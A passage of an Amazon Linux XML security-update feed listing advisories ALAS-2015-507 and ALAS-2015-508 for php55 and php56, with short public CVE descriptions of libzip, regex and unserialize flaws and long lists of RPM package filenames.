version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.39" release="1.67.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.39-1.67.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.39-1.67.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.39" release="1.67.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.39-1.67.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-507</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-507: important priority package update for php55</title><issued date="2015-04-15 21:49:00" /><updated date="2015-04-15 22:21:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-2331:
An integer overflow flaw, leading to a heap-based buffer overflow, was found in the way libzip, which is also embedded in PHP, processed certain ZIP archives. If an attacker were able to supply a specially crafted ZIP archive to an application using libzip, it could cause the application to crash or, possibly, execute arbitrary code.
1204676:
CVE-2015-2331 libzip: integer overflow when processing ZIP archives
CVE-2015-2305:
Integer overflow in the regcomp implementation in the Henry Spencer BSD regex library (aka rxspencer) alpha3.8.g5 on 32-bit platforms, as used in NetBSD through 6.1.5 and other products, might allow context-dependent attackers to execute arbitrary code via a large regular expression that leads to a heap-based buffer overflow.
1191049:
CVE-2015-2305 regex: heap overflow in regcomp() on 32-bit architectures
CVE-2015-0231:
Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate numerical keys within the serialized properties of an object. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-8142.
A use-after-free flaw was found in the way PHP's unserialize() function processed data. If a remote attacker was able to pass crafted input to PHP's unserialize() function, they could cause the PHP interpreter to crash or, possibly, execute arbitrary code.
1185397:
CVE-2015-0231 php: use after free vulnerability in unserialize() (incomplete fix of CVE-2014-8142)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0231" title="" id="CVE-2015-0231" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2305" title="" id="CVE-2015-2305" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2331" title="" id="CVE-2015-2331" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-gd" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.23" release="1.99.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.23-1.99.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.23-1.99.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.23" release="1.99.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.23-1.99.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-508</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-508: important priority package update for php56</title><issued date="2015-04-15 21:50:00" /><updated date="2015-04-15 22:21:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-2331:
An integer overflow flaw, leading to a heap-based buffer overflow, was found in the way libzip, which is also embedded in PHP, processed certain ZIP archives. If an attacker were able to supply a specially crafted ZIP archive to an application using libzip, it could cause the application to crash or, possibly, execute arbitrary code.
1204676:
CVE-2015-2331 libzip: integer overflow when processing ZIP archives
CVE-2015-2305:
Integer overflow in the regcomp implementation in the Henry Spencer BSD regex library (aka rxspencer) alpha3.8.g5 on 32-bit platforms, as used in NetBSD through 6.1.5 and other products, might allow context-dependent attackers to execute arbitrary code via a large regular expression that leads to a heap-based buffer overflow.
1191049:
CVE-2015-2305 regex: heap overflow in regcomp() on 32-bit architectures
CVE-2015-0231:
Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate numerical keys within the serialized properties of an object. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-8142.
A use-after-free flaw was found in the way PHP's unserialize() function processed data. If a remote attacker was able to pass crafted input to PHP's unserialize() function, they could cause the PHP interpreter to crash or, possibly, execute arbitrary code.
1185397:
CVE-2015-0231 php: use after free vulnerability in unserialize() (incomplete fix of CVE-2014-8142)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0231" title="" id="CVE-2015-0231" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2305" title="" id="CVE-2015-2305" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2331" title="" id="CVE-2015-2331" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-pgsql" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.7" release="1.110.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.7-1.110.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gd-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-bcmath" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-bcmath-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-gmp" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-gmp-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-imap" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-imap-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-devel" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-devel-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-soap" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-dbg" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dbg-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-common" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-common-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-embedded" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-embedded-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-mcrypt" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pspell-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-snmp" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-snmp-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.7" release="1.110.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.7-1.110.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.7" release="1.110.amzn1" epoch="0" 